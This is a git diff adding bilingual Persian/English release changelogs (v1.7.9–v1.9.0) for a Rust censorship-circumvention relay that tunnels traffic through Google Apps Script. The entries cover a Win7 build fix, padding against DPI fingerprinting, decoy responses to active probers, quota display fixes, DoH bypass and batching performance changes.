`GetSystemTimeAsFileTime` (Win2k+) کرد، و این نیاز کرد binary ویندوز ۳۲ بیتی از kernel32 یه export که تو Win7 وجود نداره use کنه. binary v1.7.7/v1.7.8 با خطای `the procedure entry point GetSystemTimePreciseAsFile could not be located in the dynamic link library kernel32.dll` روی Win7 SP1 بسته می‌شد. **Fix:** فقط target `i686-pc-windows-msvc` رو در workflow CI به Rust 1.77.2 (آخرین stable Win7-compatible) pin کردیم. سایر targets روی stable می‌مونن. این یعنی artifact `mhrv-rs-windows-i686.zip` در v1.7.9 روی Win7 SP1 ۳۲ بیتی load می‌شه. ممنون از @Im-P3dro برای گزارش +--- +• Fix "i686 Windows binary fails to load on Windows 7 32-bit" ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318), [#323](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/323)): Rust 1.78 (May 2024) raised std's Windows MSRV from Win7 to Win10 by switching `std::time` to `GetSystemTimePreciseAsFileTime` (Win8+ in kernel32) instead of the older `GetSystemTimeAsFileTime`. The v1.7.7 and v1.7.8 i686 Windows binaries failed to load on Win7 SP1 with `the procedure entry point GetSystemTimePreciseAsFile could not be located in the dynamic link library kernel32.dll`, defeating the entire reason that target ships (legacy Win7 32-bit boxes per #272). **Fix:** pin only the `i686-pc-windows-msvc` CI matrix entry to Rust 1.77.2 (the last stable that targets Win7); every other target stays on `@stable`. The `mhrv-rs-windows-i686.zip` artifact in v1.7.9 once again loads on Win7 SP1. Thanks @Im-P3dro for the report. diff --git a/docs/changelog/v1.8.0.md b/docs/changelog/v1.8.0.md new file mode 100644 index 00000000..77a79bd7 --- /dev/null +++ b/docs/changelog/v1.8.0.md @@ -0,0 +1,12 @@ + +• Padding random برای پایلود Apps Script ([#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)، [#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 1): هر request به Apps Script حالا یک فیلد `_pad` با طول uniform-random بین ۰-۱۰۲۴ بایت اضافه می‌کنه — به‌صورت base64 encoded. بدون این، طول request body در هر mode تقریباً ثابت می‌مونه + DPI ایران می‌تونه بر اساس distribution طول fingerprint بزنه. حالا packet sizes uniformly distributed هستن + length-clustering match نمی‌کنه. تأثیر bandwidth: متوسط ۵۱۲ بایت اضافه به batch ~۲KB = +۲۵٪، negligible در برابر floor latency Apps Script. backward-compatible: Code.gs قدیم هم کار می‌کنه (unknown JSON fields ignore می‌شن). +• Defense active probing: decoy 200 HTML در Code.gs / CodeFull.gs روی AUTH_KEY بد ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): قبلاً request بدون auth `{"e":"unauthorized"}` JSON برمی‌گردوند — fingerprint مشخص "این یه API endpoint هست". حالا یه HTML benign placeholder برمی‌گردونه که شبیه یه Apps Script web app forgotten-but-public هست. scanner active که با AUTH_KEY ساختگی POST می‌کنه categorize می‌کنه به‌عنوان "non-tunnel، nothing interesting". flag `DIAGNOSTIC_MODE` برای setup که response قدیمی JSON رو برمی‌گردونه — default `false` (production-strong) +• Defense active probing: decoy 404 nginx در tunnel-node روی auth بد: tunnel-node قبلاً `{"e":"unauthorized"}` JSON برمی‌گردوند. حالا response 404 با body HTML شبیه nginx default error می‌فرسته (active scanners "static web server هست، tunnel نیست" تشخیص می‌دن). env var `MHRV_DIAGNOSTIC=1` برای setup behavior قدیمی رو فعال می‌کنه +• رفع باگ "Usage today (estimated) در Full mode همیشه ۰" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230)، [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): counter `today_calls` و `today_bytes` فقط روی apps_script-mode relay path در `domain_fronter::relay()` افزایش می‌یافت. Full mode از `tunnel_client::fire_batch` می‌گذره که کانتر رو زد. حالا fire_batch بعد از batch موفق `record_today(response_bytes)` رو صدا می‌زنه — bytes از sum طول `d` و `pkts` در BatchTunnelResponse تخمین زده می‌شه. Full mode users حالا "Usage today" واقعی می‌بینن +• رفع باگ "quota reset countdown با time UTC به‌جای PT نشون داده می‌شه" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230)، [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): Apps Script's UrlFetchApp quota در 00:00 **Pacific Time** ریست می‌شه (PST/PDT با DST)، نه UTC. ما UTC midnight رو نشون می‌دادیم — ۷-۸ ساعت off. fix: helpers جدید `current_pt_day_key()` + `seconds_until_pacific_midnight()` با hand-rolled DST detection (بدون اضافه کردن chrono-tz / 3MB tzdb). UI label "UTC day" → "PT day" تغییر کرد. ۲ test جدید برای DST window boundaries (مارس ۲۰۲۴/۲۰۲۶/۲۰۲۷، نوامبر ۲۰۲۴/۲۰۲۶) + Sakamoto's day-of-week +--- +• Random payload padding for Apps Script requests ([#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313), [#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 1): every outbound request to Apps Script now carries a `_pad` field of uniform-random length 0–1024 bytes (base64 encoded). Before this, request body sizes within each mode were tightly clustered, giving ISP DPI a clean length-distribution fingerprint to match against. Now packet sizes are spread uniformly across the range so length-clustering DPI heuristics can't match. Bandwidth cost: ~512 bytes added to a typical 2 KB tunnel batch = +25%, negligible against Apps Script's per-call latency floor. Backward-compatible: old Code.gs deployments ignore the unknown field. Applied at all three payload-build sites: single relay, single tunnel op, batch tunnel. +• Active-probing defense: decoy 200 HTML on bad AUTH_KEY in `Code.gs` and `CodeFull.gs` ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): previously a request with a missing/wrong AUTH_KEY got `{"e":"unauthorized"}` as a JSON body — a clear "this is some kind of API endpoint" signal that active scanners can fingerprint. Now bad-auth requests get a benign HTML placeholder page that looks like a forgotten-but-public Apps Script web app, indistinguishable from the millions of stale Apps Script projects on Google's infrastructure. New `DIAGNOSTIC_MODE` const (default `false`) restores the old JSON error response for setup/debugging — flip to `true` while configuring a misconfigured client, then back to `false` before sharing the deployment widely. +• Active-probing defense: decoy 404 nginx-style HTML on bad auth in `tunnel-node` ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): previously a bad-auth request got `{"e":"unauthorized"}`. Now it gets an HTTP 404 with an `nginx`-style error page body, looking like a vanilla static web server. Active scanners that POST malformed payloads to `/tunnel` to discover proxy endpoints categorize this host as "boring" and move on. New `MHRV_DIAGNOSTIC=1` env var restores the verbose JSON error during setup; default is the production decoy. +• Fix "Usage today (estimated) is always 0 in Full mode" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230), [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): the daily-usage counters (`today_calls` / `today_bytes`) were incremented only on the `apps_script`-mode relay path inside `domain_fronter::relay()`. Full-mode traffic goes through `tunnel_client::fire_batch` which never wired the counter. Now `fire_batch` calls `record_today(response_bytes)` after each successful batch — bytes are estimated from the sum of per-session `d` (TCP payload) and `pkts` (UDP datagrams) lengths in the `BatchTunnelResponse`, which is a stable proxy for "how much did this batch move." Full mode users now see real usage numbers instead of stuck-at-zero. +• Fix "quota reset countdown shown in UTC instead of Pacific Time" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230), [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): Apps Script's `UrlFetchApp` quota actually resets at midnight Pacific Time (PST/PDT — observes DST), not midnight UTC. We were displaying the countdown to UTC midnight, which is 7–8 hours off depending on DST. Fix: new `current_pt_day_key()` + `seconds_until_pacific_midnight()` helpers using a hand-rolled US DST detector (2nd Sunday of March → 1st Sunday of November = PDT, otherwise PST) so we don't pull `chrono-tz` and a ~3 MB IANA tzdb just for one helper. UI label updated from "UTC day" to "PT day". Two new tests pin down the DST window boundaries (March 2024 / 2026 / 2027, November 2024 / 2026) and Sakamoto's day-of-week formula. diff --git a/docs/changelog/v1.8.1.md b/docs/changelog/v1.8.1.md new file mode 100644 index 00000000..56bcadc2 --- /dev/null +++ b/docs/changelog/v1.8.1.md @@ -0,0 +1,8 @@ + +• تشخیص خطای decoy v1.8.0 در سمت کلاینت — پیغام واضح به‌جای cryptic ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)، [#310](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310)): قبلاً وقتی deployment auth fail می‌گرفت + decoy HTML برمی‌گردوند، client پیغام `WARN batch failed: bad response: no json in batch response: ...` می‌داد. کاربر باید خودش متن decoy رو می‌شناخت تا تشخیص بده. حالا client decoy رو با string-match تشخیص می‌ده + پیغام explicit می‌ده: "got the v1.8.0 bad-auth decoy — your AUTH_KEY in mhrv-rs config does NOT match the AUTH_KEY in this deployment's Code.gs. Either fix the mismatch + redeploy as a NEW VERSION, or set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy to see the explicit JSON `unauthorized` error during setup." — کاربر مستقیم می‌فهمه چی بکنه + ساعت‌ها debug ذخیره می‌شه +• اضافه شدن `script_id` به همه log‌های batch-failure ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): قبلاً log `WARN batch failed: ...` نام deployment که fail کرد رو نشون نمی‌داد. در multi-deployment scenarios (5-10 deployment که برخی AUTH_KEY اشتباه داره)، کاربر نمی‌تونست بدون سختی deployment معیوب رو identify کنه. حالا همه پیغام‌های failure (timeout، bad response، decoy، missing-response-in-batch) شامل short prefix script_id هستند: `batch failed (script AKfycbz4): ...`. این + flag تشخیص decoy، اولین diagnostic از سرنوشت توزیع کاربری به طور reliable +• Flag config جدید `disable_padding: true` ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)): پیش‌فرض `false` (padding فعال = DPI defense). برای کاربران روی ISP‌های heavily-throttled که هزینه padding ~۲۵٪ bandwidth با throttle compounds + batchهای borderline-working رو into timeout می‌اندازه، گذاشتن `"disable_padding": true` در config.json در ازای محافظت length-distribution DPI، headroom برمی‌گردونه. توصیه نیست speculatively فعال بشه — فقط بعد از measurement throughput improvement. +--- +• Client-side decoy detection — clear hint instead of cryptic error ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404), [#310](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310)): previously when a deployment had a stale/wrong AUTH_KEY, mhrv-rs returned the v1.8.0 bad-auth decoy HTML, and the client logged `WARN batch failed: bad response: no json in batch response: ...` — leaving the user to recognize the decoy body string and infer the cause. Now the client string-matches the decoy and emits an explicit error: "got the v1.8.0 bad-auth decoy — your AUTH_KEY in mhrv-rs config does NOT match the AUTH_KEY in this deployment's Code.gs. Either fix the mismatch + redeploy as a NEW VERSION (Apps Script doesn't auto-pick-up AUTH_KEY edits without an explicit redeploy), or set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy to see the explicit JSON `unauthorized` error during setup." Saves users hours of staring at "no json in batch response" trying to figure out what's wrong. +• Add `script_id` to every batch-failure log line ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): previously `WARN batch failed: ...` didn't identify which deployment failed. In multi-deployment setups (5-10 deployments where one or two have a stale AUTH_KEY), users couldn't identify the culprit without the per-deployment curl probe loop. Every failure log line now includes the short script_id prefix: `batch failed (script AKfycbz4): ...`, applied to all four failure paths (timeout, bad response, decoy, missing-response-in-batch). Together with the decoy detection above, the first reliable diagnostic for the multi-deployment-with-one-bad-AUTH_KEY user pattern. +• New `disable_padding: true` config flag ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)): default `false` (padding active, full DPI defense). For users on heavily-throttled ISPs where the v1.8.0 random-padding cost (+~25% bandwidth per batch) compounds with the throttle to push borderline-working batches into timeouts, setting `"disable_padding": true` in `config.json` recovers headroom in exchange for losing length-distribution DPI defense. Don't flip on speculatively — for users where Apps Script outbound is uncongested, padding is free defense. Only enable if you've measured throughput improvement after the flip on your specific ISP path. diff --git a/docs/changelog/v1.8.2.md b/docs/changelog/v1.8.2.md new file mode 100644 index 00000000..9350c9c3 --- /dev/null +++ b/docs/changelog/v1.8.2.md @@ -0,0 +1,6 @@ + +• اصلاح log level در UI binary (Windows + Android) ([#401](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/401)): قبلاً `mhrv-rs-ui` (و Android) فیلتر tracing رو فقط از `RUST_LOG` env var یا default `info,hyper=warn` می‌خوند — مقدار `log_level` در `config.json` در عمل ignore می‌شد. فرم UI combobox `log_level` داشت ولی هیچ‌جا به subscriber اعمال نمی‌شد. حالا precedence اینه: `RUST_LOG` (اگر set باشد) > `config.log_level` > `info,hyper=warn`. علاوه بر این Save در UI الان log level رو live اعمال می‌کنه (بدون نیاز به restart) از طریق reload handle. CLI `mhrv-rs` از قبل درست کار می‌کرد — این فقط fix UI bin بود. +• پیغام تشخیص decoy ملایم‌تر — به‌جای assert AUTH_KEY mismatch، چهار علت ممکن enumerate می‌کنه ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): @w0l4i گزارش داد همان `script_id` گاهی decoy و گاهی موفقیت برمی‌گرده در یک دقیقه — یعنی NOT AUTH_KEY mismatch (اگر بود ۱۰۰٪ fail می‌گرفت). تحقیق نشون داد body string `"The script completed but did not return anything"` اختصاصی به decoy v1.8.0 ما نیست — Apps Script همان body رو در ۴ سناریو برمی‌گردونه: (۱) AUTH_KEY mismatch (decoy ما، intentional)، (۲) Apps Script execution timeout یا quota tear، (۳) Google-side internal hiccup، (۴) ISP-side response truncation (#313 pattern). Error message v1.8.1 false positive داشت در سناریو ۲-۴. حالا پیغام: "got the v1.8.0 decoy/placeholder body — could be (1) AUTH_KEY mismatch, (2) Apps Script execution timeout/quota tear, (3) Apps Script internal hiccup, (4) ISP-side response truncation. Set DIAGNOSTIC_MODE=true to disambiguate (1) — only AUTH_KEY mismatch returns this body in diagnostic mode." کاربر action درست رو کشف می‌کنه. +--- +• Fix log level on the UI binary (Windows + Android) ([#401](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/401)): previously `mhrv-rs-ui` (and Android, which uses the same JNI path) installed its tracing filter from `RUST_LOG` only — falling back to `info,hyper=warn` when unset. The `log_level` field in `config.json` was effectively ignored, even though the UI form has a combobox that writes to it. The CLI binary (`mhrv-rs`) read `config.log_level` correctly via `init_logging()`; only the UI binary was broken. New precedence: `RUST_LOG` (explicit override) > `config.log_level` (what the user picked in the form) > `info,hyper=warn` (default). The Save button now also reinstalls the filter live via a `tracing_subscriber::reload::Handle`, so users don't need to restart for a level change to take effect. RUST_LOG still wins if set at boot — explicit override beats config in both directions. +• Soften the v1.8.1 decoy detection error message — enumerate four candidate causes instead of asserting AUTH_KEY mismatch ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): @w0l4i reported the same `script_id` mixing decoy ERROR with successful batches inside a one-minute window — which rules out AUTH_KEY mismatch as the cause (a real mismatch fails 100% of batches against that deployment, never succeeds intermittently). Investigation showed the body string `"The script completed but did not return anything"` is **not** unique to our v1.8.0 bad-auth path — Apps Script itself returns the same body in three other unrelated cases: (2) Apps Script execution timeout or per-100s quota tear, (3) Google-side internal runtime hiccup, (4) ISP-side response truncation mid-flight (the #313 pattern). The v1.8.1 error message was a false positive in scenarios 2-4. The v1.8.2 message now reads: "got the v1.8.0 decoy/placeholder body — could be (1) AUTH_KEY mismatch (run a direct curl probe against the deployment to verify), (2) Apps Script execution timeout or per-100s quota tear (try lowering parallel_concurrency), (3) Apps Script internal hiccup (transient, retry next batch), or (4) ISP-side response truncation (#313 pattern, try a different google_ip). To distinguish (1) from the rest: set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy as new version — only AUTH_KEY mismatch returns this body in diagnostic mode." Users now have an actionable narrowing procedure instead of a confidently-wrong assertion. diff --git a/docs/changelog/v1.8.3.md b/docs/changelog/v1.8.3.md new file mode 100644 index 00000000..f408ce94 --- /dev/null +++ b/docs/changelog/v1.8.3.md @@ -0,0 +1,12 @@ + +• cache spreadsheet اختیاری در Code.gs برای کاهش مصرف quota ([#400](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/400)، PR [#443](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/443) از @euvel): GET requests عمومی که Cache-Control header دارن می‌تونن از Google Sheet به‌جای Apps Script's UrlFetchApp serve بشن. هزینه‌ی هر cache hit ~۵-۲۰ms (Sheet read) به‌جای ۲۵۰-۵۰۰ms (UrlFetchApp roundtrip). features کامل: TTL-aware (max-age, no-cache, no-store, private respect)، header rewriting (Date/Age/X-Cache)، circular buffer برای O(1) writes، Vary-aware با Accept-Encoding/Accept-Language. opt-in via یک constant `CACHE_SPREADSHEET_ID` در Code.gs — default غیرفعال، بدون overhead برای کاربران که نمی‌خوان. setup: ساخت یک Google Sheet جدید + قرار دادن ID آن در `CACHE_SPREADSHEET_ID` + redeploy as new version +• bypass DoH endpoints from Apps Script tunnel ([#377](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/377)، PR [#439](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/439) از @dazzling-no-more): قبلاً در Full mode هر DNS-over-HTTPS lookup browser از طریق Apps Script tunnel می‌رفت — `chrome.cloudflare-dns.com:443`، `dns.google:443` و سایر هزینه ~۲ ثانیه UrlFetchApp roundtrip به ازای هر name داشتن. ولی DoH از قبل encrypted هست + tunnel privacy اضافه‌ای نمی‌ده — فقط fact-of-DoH رو از local network مخفی می‌کنه که ناچیزه. حالا `bypass_doh_hosts` config (default true) routes DoH lookups مستقیم via TCP/443. لیست کامل bypass شامل: Cloudflare (incl. chrome./mozilla./1dot1dot1dot1.)، Google، Quad9، AdGuard، NextDNS، OpenDNS، CleanBrowsing، dns.sb، dns0.eu، AliDNS، doh.pub، Mullvad. کاربران می‌توانند با `tunnel_doh: true` در config opt-out کنن یا با `bypass_doh_hosts: ["custom1.com", "custom2.com"]` لیست رو extend کنن +• H1 container keepalive (~۲۴۰s) برای جلوگیری از Apps Script V8 cold-start stalls (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) از @dazzling-no-more): Apps Script container‌ها بعد از ~۵ دقیقه idle cold می‌شن + ۱-۳ ثانیه به wake-up زمان می‌برن. این به‌خصوص در YouTube playback بعد از pause طولانی stall به‌وضوح دیده می‌شد. با ping HEAD به example.com هر ۲۴۰ ثانیه از طریق relay، container warm نگه داشته می‌شه. cache + inflight coalescer bypass شده تا ping واقعاً به Apps Script برسه. در google_only mode غیرفعال +• 431 Request Header Fields Too Large به‌جای drop سکوتی (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) از @dazzling-no-more): قبلاً اگر header block > ۱ MB می‌شد، socket drop می‌شد + browser silently retry می‌کرد + loop ابدی. حالا cap به ۶۴ KB کاهش یافته (match upstream Python) + explicit `HTTP/1.1 431 Request Header Fields Too Large` response برمی‌گرده + close می‌شه. browser ارور رو ببینه + loop رو نمی‌سازه +• پیام error config port-collision واضح‌تر شد (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438)): قبلاً پیام cryptic بود. حالا: `"both set to 8080 on 127.0.0.1. Change one of them in config.json."` — کاربر مستقیم می‌فهمه چی fix بکنه +--- +• Optional spreadsheet-backed response cache in `Code.gs` to reduce UrlFetchApp quota consumption ([#400](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/400), PR [#443](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/443) by @euvel): public GET requests with `Cache-Control` headers can now be served from a Google Sheet instead of round-tripping through `UrlFetchApp`. Cache hit costs ~5-20ms (Sheet read) vs ~250-500ms (UrlFetchApp). Features: TTL-aware caching (respects `max-age`, `no-cache`, `no-store`, `private`), 35 KB body-size gate (under the Sheets cell limit), header rewriting (Date/Age/Cache-Control/X-Cache/X-Cached-At), circular buffer for O(1) writes, Vary-aware compound keys (Accept-Encoding + Accept-Language). Opt-in via a single `CACHE_SPREADSHEET_ID` constant — default off, zero overhead for users who don't want it. Setup: create a new Google Sheet, paste its ID into `CACHE_SPREADSHEET_ID`, redeploy as new version. Run `getCacheStats()` from the Apps Script editor to see hit/miss/eviction counts. +• Bypass Apps Script tunnel for DoH endpoints on TCP/443 ([#377](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/377), PR [#439](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/439) by @dazzling-no-more): previously every browser DNS-over-HTTPS lookup in Full mode rode through the Apps Script tunnel — `chrome.cloudflare-dns.com:443`, `dns.google:443`, etc. each paid the ~2-second UrlFetchApp round-trip per name. But DoH is already encrypted at the transport layer; tunneling it adds no real privacy (only hiding fact-of-DoH from the local network, which is marginal). Now `bypass_doh_hosts` config (default `true`) routes known DoH hosts around the tunnel via plain TCP. Built-in list: Cloudflare (incl. `chrome.`/`mozilla.`/`1dot1dot1dot1.` browser-pinned variants), Google, Quad9, AdGuard, NextDNS, OpenDNS, CleanBrowsing, dns.sb, dns0.eu, AliDNS, doh.pub, Mullvad. Users can opt out with `tunnel_doh: true` or extend the list with `bypass_doh_hosts: ["custom1.com", "custom2.com"]`. Gated to TCP/443 only — private DoH endpoints on `:8443` should use `passthrough_hosts` instead. ProxyServer warns at startup if `tunnel_doh: true` is paired with non-empty `bypass_doh_hosts` (the otherwise-silent inert combo). 6 unit tests for `matches_doh_host` covering exact match, case insensitivity, trailing dots, suffix tenant subdomains, user extras extending the default list, and the asymmetric-matching footgun guard. +• H1 container keepalive (~240s) to prevent Apps Script V8 cold-start stalls (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) by @dazzling-no-more): Apps Script V8 containers go cold after ~5 minutes idle and cost 1-3s to wake. Most visible as YouTube player stalls after a quiet pause. Now sends a `HEAD http://example.com/` ping every 240s through the relay to keep the container warm. Bypasses the response cache and inflight coalescer (otherwise the second iteration would just hit the cache and never reach Apps Script). Skipped in `google_only` mode. The `JoinHandle` is captured so shutdown's `select!` arm can abort it cleanly — without that, hitting Stop in the UI would leave the keepalive holding an `Arc` on stale config (same class of bug as #99 hit for accept loops). +• 431 Request Header Fields Too Large instead of silent drop (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) by @dazzling-no-more): previously header blocks larger than 1 MB were silently dropped at the socket level, causing browsers to retry on connection-reset and loop indefinitely on the same oversized request. Now the cap is tightened to 64 KB (matching upstream Python's `MAX_HEADER_BYTES`) and oversized requests get an explicit `HTTP/1.1 431 Request Header Fields Too Large` reply followed by close. Both the plaintext HTTP frontend and the MITM HTTPS relay path now do this. Browsers see the error and don't loop. +• Clearer port-collision error message (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438)): the same-port validation already existed; only the message was vague. Now reads: `"both set to 8080 on 127.0.0.1. Change one of them in config.json."` matching upstream Python's clarity. diff --git a/docs/changelog/v1.8.4.md b/docs/changelog/v1.8.4.md new file mode 100644 index 00000000..11e479a1 --- /dev/null +++ b/docs/changelog/v1.8.4.md @@ -0,0 +1,8 @@ + +• **adaptive batch coalescing** برای کاهش تعداد Apps Script roundtrip‌ها (PR [#448](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/448) از @yyoyoian-pixel): قبلاً هر op فقط ۸ms برای op‌های هم‌زمان دیگر صبر می‌کرد + اکثراً batchها فقط ۱ op داشتن. حالا scheme adaptive: اولین op یک timer ۴۰ms استارت می‌زنه، op‌های جدید reset می‌کنن، اگر ۴۰ms idle شد batch fire می‌شه. cap نهایی ۱۰۰۰ms. نتیجه field test روی شبکه ایران: ops/batch از ۱.۰ به ۲-۳، P75 RTT از ۶.۲s به ۳.۰s، کاهش ~۵۰٪ Apps Script call. configurable از طریق `coalesce_step_ms` / `coalesce_max_ms` در config + در Android UI Advanced section با slider +• **tunnel-node long-poll از ۵s به ۱۵s** برای پایداری Telegram + Google Push (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446) از @yyoyoian-pixel): قبلاً connection‌های persistent (Telegram XMPP پورت ۵۲۲۲، Google Push پورت ۵۲۲۸) هر ۵ ثانیه empty-response برمی‌گرفتن + apps این رو instability تفسیر می‌کردن + session reconnect می‌زدن. هر reconnect معادل یک TLS handshake کامل (~۴s از طریق Apps Script) یعنی buffering قابل مشاهده در تماس Telegram یا playback. حالا long-poll تا ۱۵ ثانیه باز می‌مونه + persistent connection پایدار می‌مونه +• **adaptive straggler settle** در tunnel-node (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446)): قبلاً fixed ۳۰ms wait بعد از اولین session که data داشت. حالا adaptive ۴۰ms-step تا ۵۰۰ms-max که زود break می‌شه اگر همه session‌ها ready باشن. در شبکه‌های latency بالا (~۱.۵s Apps Script overhead) packing بیشتر session response در یک batch، quota مصرف کم‌تری ایجاد می‌کنه +--- +• **Adaptive batch coalescing** to reduce Apps Script round-trip count (PR [#448](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/448) by @yyoyoian-pixel): the previous fixed 8ms coalesce window barely caught concurrent ops — most batches were a single op. The new adaptive scheme starts a 40ms timer on first arrival, resets on each new op, fires the batch when the window stays empty, with a hard 1000ms cap. Field testing on a network in Iran showed ops/batch went from ~1.0 to 2-3, P75 RTT 6.2s → 3.0s, fast (<3s) batches 61% → 74-85%, total Apps Script calls roughly halved. Both values configurable via `coalesce_step_ms` / `coalesce_max_ms` in `config.json` and via sliders in the Android UI's Advanced section. Desktop UI sliders are queued for the v1.8.x desktop UI batch alongside the system-proxy toggle (#432). +• **tunnel-node long-poll raised from 5s to 15s** for persistent-connection stability (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446) by @yyoyoian-pixel): at 5s long-poll, persistent connections like Telegram XMPP (`:5222`) and Google Push (`mtalk.google.com:5228`) interpreted the frequent empty-poll returns as connection instability and rotated sessions. Each reconnect cost a full TLS handshake (~4s through Apps Script), causing visible interruptions during Telegram video/voice calls and media playback. The 15s long-poll holds the response open until server data actually arrives, keeping persistent sessions alive without unnecessary re-handshakes. +• **Adaptive straggler settle in tunnel-node** (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446)): the previous fixed 30ms straggler settle was too short to catch neighboring sessions with data. Replaced with adaptive 40ms-step / 500ms-max settle that breaks early when all sessions in a batch have data. On high-latency relays (~1.5s Apps Script overhead per call), packing more session responses into one batch saves quota; the early-break prevents wasted time when all data is already ready. diff --git a/docs/changelog/v1.8.5.md b/docs/changelog/v1.8.5.md new file mode 100644 index 00000000..eead68c8 --- /dev/null +++ b/docs/changelog/v1.8.5.md @@ -0,0 +1,4 @@ + +• fix tunnel-node: cap هر TCP drain روی ۱۶ MiB تا batch response از سقف Apps Script (~۵۰ MiB) عبور نکنه ([#460](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/460) از @bankbunk): روی VPS های پر-bandwidth (۱ Gbps) reader task می‌تونه هزاران مگابایت رو در buffer per-session جمع کنه قبل از اینکه poll بعدی بیاد. قبلاً `drain_now` همه‌ی buffer رو در یک batch response می‌گرفت، base64 encoding (~۱.۳۳×) + JSON envelope اضافه می‌کرد، نتیجه از سقف ۵۰ MiB Apps Script رد می‌شد. Apps Script body رو wrap-around mid-base64 کوتاه می‌کرد + client side `serde_json` parse error با `EOF while parsing a string at line 1 column 52428685` می‌گرفت. برای استریم MP4 یا هر بایت‌سنگین upstream این bug stream رو مرتب کرش می‌داد. حالا `drain_now` حداکثر ۱۶ MiB در هر poll برمی‌گردونه + tail رو در buffer برای poll بعدی نگه می‌داره. eof تا finalize شدن buffer reported نمی‌شه که session بی‌موقع tear نشه. workaround قبلی @bankbunk (محدودکردن interface VPS با `wondershaper` به ۴۰ Mbps) دیگر لازم نیست — fix server-side پیاده شد و کاربران throughput عادی VPS رو خواهند داشت +--- +• Fix tunnel-node: cap each TCP drain at 16 MiB so batch responses stay under Apps Script's ~50 MiB body ceiling ([#460](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/460) by @bankbunk): on high-bandwidth VPS (1 Gbps+), the reader task can stuff the per-session read buffer with tens of MiB between client polls. The old `drain_now` took the entire buffer in one shot, base64-encoded it (1.33× overhead), wrapped it in JSON, and the resulting body exceeded Apps Script's hard ~50 MiB Web App response limit. Apps Script truncated the body mid-base64; the client failed `serde_json` parse with `EOF while parsing a string at line 1 column 52428685` (= 50 MiB) and the stream tore. Most visibly, raw MP4 streams crashed minutes into playback. The fix splits oversized buffers: at most `TCP_DRAIN_MAX_BYTES` (16 MiB) is returned per drain, and the remainder stays in the buffer for the next poll. EOF is held back until the buffer is fully drained so partial drains don't prematurely close the session. Three regression tests cover the cap, the under-cap pass-through, and the EOF-holdback case (33 tunnel-node tests passing). @bankbunk's `wondershaper` workaround (rate-limiting the VPS interface to 40 Mbps) is no longer necessary — high-bandwidth VPS users can let throughput run at line rate again. diff --git a/docs/changelog/v1.9.0.md b/docs/changelog/v1.9.0.md new file mode 100644 index 00000000..2017b788 --- /dev/null +++ b/docs/changelog/v1.9.0.md @@ -0,0 +1,12 @@ + +• **شکستگی سازگاری minor: نام‌گذاری `mode = "google_only"` به `mode = "direct"` تغییر کرد** (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) از @dazzling-no-more): نام قدیمی توصیف وضعیت رو بعد از اضافه شدن fronting_groups (که فراتر از Google می‌رسه) درست نمی‌داد. در Rust + Android + UI dropdown همه به `direct` تغییر کرده‌اند، ولی **`google_only` به‌عنوان alias deprecated در parser قابل قبول مونده** — config‌ها و saved settings قدیمی نمی‌شکنن. در Save بعدی، on-disk file خودکار به `direct` migrate می‌شه. 